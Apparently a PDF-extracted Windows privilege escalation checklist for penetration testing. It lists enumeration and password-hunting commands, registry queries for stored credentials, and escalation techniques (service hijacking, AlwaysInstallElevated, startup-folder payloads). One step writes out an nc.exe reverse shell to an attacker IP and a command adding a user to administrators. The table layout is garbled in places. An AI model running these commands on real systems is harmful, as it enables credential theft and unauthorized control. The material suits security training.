Windows Priv Esc Check-List

“It always seems impossible until it’s done.” - Nelson Mandela

Download the PDF at the bottom of the page. Download and start marking check for your next windows privilege
escalation phase. ;)

Check-List

Method Commands Approach ToDo Mar

1. Copy output in your
attacking machine for
Host Information and systeminfo Manual further use. 2. Note the
Enumeration
architecture of the
machine.
Host Information and Note if you are in
whoami whoami /groups Manual
Enumeration Admin group.
Host Information and Note the hostname
hostname Manual
Enumeration and domain.

Checked all the

Host Information and
wmic logicaldisk get Caption Manual Partition of this
Enumeration
machine.
Check Local and
Host Information and
net user <username> Manual Global group
Enumeration
membership
Host Information and Check Local groups
net localgroup <username> Manual
Enumeration for a user

1. Check if any
ADSAlternate Data
Host Information and Stream) file in the
dir /R more < <datastream_file> Manual
Enumeration directory 2. View the
contents using more
command

Search for Outdated

Hot Fixes wmic qfe get Caption,Description,HotFixId,InstalledOn Manual
HotFix.

Check detail info about

Network Enumeration ipconfig /all Manual
IP Address
Check arp table and all
Network Enumeration arp -a Manual
connections
Network Enumeration route print Manual Check routes

Check connections,
internal and external
Network Enumeration netstat -ano Manual
port can be used for
port forwarding

Windows Priv Esc Check-List 1

 Method Commands ToDo
Approach Mar
Find the phrase
Password Hunting findstr /si password *.txt *.ini *.config *.xml Manual "password" in files of
current dir
Find password phrase
Password Hunting findstr /spin "password" *.* Manual
in all files

c:\sysprep.inf c:\sysprep\sysprep.xml c:\unattend.xml

%WINDIR%\Panther\Unattend\Unattended.xml Explore these files for
Password Hunting Manual
%WINDIR%\Panther\Unattended.xml dir c:\*vnc.ini /s /b dir passwords
c:\*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini

Explore password for

Password Hunting reg query "HKCU\Software\ORL\WinVNC3\Password" Manual
VNC
Password Hunting reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" Manual Windows Autologon

Password Hunting reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" Manual SNMP Parameters

Password Hunting reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" Manual Putty

reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t

Password Hunting Manual Passwords in registery
REG_SZ /s

Service Query to
Firewall and AV
sc query windefend Manual check windows
Enumeration
defender

Firewall and AV Service Query to list all

sc queryex type= service Manual
Enumeration services using

Firewall and AV
netsh firewall show state netsh advfirewall firewall dump Manual Check Firewall Status
Enumeration
Firewall and AV Check Firewall
netsh firewall show config Manual
Enumeration Configurations

winPEASwinPEASE -
Kernel Exploit winPEAS.exe Tool Kernel Vulnerabilities
Tool Download: Link
1. Download Link 2.
Update the database
./windows-exploit-suggester.py --update pip install xlrd --upgrade 3. Install pip xlrd 4.
Kernel Exploit ./windows-exploit-suggester.py --database <database>.xls --systeminfo Tool
<sysinfo file>.txt Include updated xls
and file having sysinfo
output

1. SecWiki 2.
zerosum00 3.
Kernel Exploit Manual/Tool abatchy17
#precompiled 4. rasta-
mouse

Place the executable

file with the first name
of the directory ex:
C\help\test
Unquoted Service me\service.exe Place
. .\powerup.ps1 Tool
Path the executable as
test.exe in "help"
directory to trick the
system to execute the
file when service starts

Place the executable

file with the first name
of the directory ex:
C\help\test
Unquoted Service wmic service get name,displayname,pathname,startmode |findstr /i "auto" me\service.exe Place
| findstr /i /v "c:\windows\\" |findstr /i /v """ Manual
Path the executable as
test.exe in "help"
directory to trick the
system to execute the
file when service starts

Windows Priv Esc Check-List 2

 Method Commands Approach ToDo Mar

Try to access and

WSL where /R c:\windows bash.exe where /R c:\windows wsl.exe Manual
explore the WSL

1. Check Privileges
Current User Have for
Token Impersonation.
2. Does it has
SeImperonate or
Check Privileges whoami /priv Manual
SeAssignPrimaryToken . If

yes, try Juicy Potato

Attack. 3. Else
Understand Privileges
from this link

This will work only if

both registry keys
reg query value have
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
Check Privileges reg query Manual "AlwaysInstallElevated"
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated with DWORD as 1 to
install .MSI as
SYSTEM.

1. List currently stored

cmdkey /list C:\Windows\System32\runas.exe /user:
<username>\Administrator /savecred "C:\Windows\System32\cmd.exe" /c TYPE creds of administrator
Check Privileges Manual
<C:\Users\Administrator\Desktop\root.txt> > users if it exists. 2. Run
<output_file_in_writable_dir>"
cmd as that user

1. Download, copy and

run the file in
compromised machine.
C:\Users\User\Desktop\Tools\Autorun\Autorun64.exe 2. Find interesting
Autorun C:\Users\User\Desktop\Tools\Accesschk\Accesschk64.exe -wvu " Manual program running. 3.
<Interesting_program>"
Download Accesschk
and run 4. Replace
reverse.exe to that
autorun file

PowerUp powershell -ep bypass . .\PowerUp.ps1 Invoke-AllChecks Tool Analyze the output

1. If Value is 01 means

it is on. 2. Create
reg query HKLM\Software\Policies\Microsoft\Windows\Installer msiexec /i
AlwaysInstallElevated "path.msi"
Manual reverse.msi and
listening nc 3. Install
the msi

1. Check FullControl

on the powershell
command 2. Install
mingw lib sudo apt
powershell -ep bypass Get-Acl -Path
install gcc-mingw-w64 3.
hklm:\System\CurrentControlSet\services\regsvc x86_64-w64-mingw32-cc Manual
Compile the code for
Service Escalation windows_service.c -o x.exe reg add Pending to
windows service 4.
HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t attach file)
REG_EXPAND_SZ /d c:\temp\x.exe /f sc start regsvc
Add Registry and
Execute 5. Start
Registry 6. User
Added 7. Login to the
user

1. PowerUp.ps1 to find
Manual
Services As service which runs
powershell -ep bypass . .\powerup.ps1 Pending to
Excutable executable 2. Replace
attach file)
the executable.

1. Check if the current

user have (F) full
access to the startup
icals.exe "C:\ProgramData\Microsoft\Windows\Start
Startup Applications Menu\Programs\Startup" Manual dir 2. Put the
reverse.exe in the
folder 3. Logout and
login

Windows Priv Esc Check-List 3

 Method Commands Approach ToDo Mar

1. Find rw access for a

service name with
Everyone group 2.

Check if you can

accesschk64.exe -uwcv Everyone * accesschk64.exe -uwcv <service_name>
change the
sc qc <service_name> sc config <service_name> binpath= "net localgroup
Binary Path Manual configurations 3. Add
administrators <user> /add" or "nc.exe <attacker_ip> <port> -e cmd.exe"
user to administrator
sc start <service_name> net localgroup administrator
group 4. Start service
5. Check localgroup if
you are added in
Admin group
1. Check files in
Program Files 2. Try to
Manual Enum Manual
understand and exploit
the existing software

Author - Bhashit Pandya

https://twitter.com/x30r_

Windows Priv Esc Check-List 4